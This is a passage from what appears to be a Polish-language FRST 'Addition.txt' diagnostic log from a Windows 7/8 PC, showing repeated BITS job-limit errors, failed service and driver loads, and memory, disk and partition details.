zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:34:14 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:34:13 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:34:13 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:34:13 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:34:12 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie zakończ lub anuluj zadania usługi BITS, dla których nie odnotowano postępu, a następnie uruchom ponownie usługę BITS. Jeśli ten błąd będzie się powtarzać, poproś administratora systemu o zwiększenie w zasadach grupy limitów zadań na komputer i na użytkownika. Error: (01/06/2018 06:29:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ed2k idle service z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (01/06/2018 06:27:09 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: iSafeKrnl iSafeKrnlKit iSafeKrnlMon iSafeKrnlR3 Error: (01/06/2018 06:27:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi atksgt z powodu następującego błędu: Nastąpiło zablokowanie ładowania sterownika ==================== Statystyki pamięci =========================== Procesor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz Procent pamięci w użyciu: 37% Całkowita pamięć fizyczna: 3037.09 MB Dostępna pamięć fizyczna: 1894.79 MB Całkowita pamięć wirtualna: 6072.5 MB Dostępna pamięć wirtualna: 4945.25 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:148.95 GB) (Free:68.77 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 58138332) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================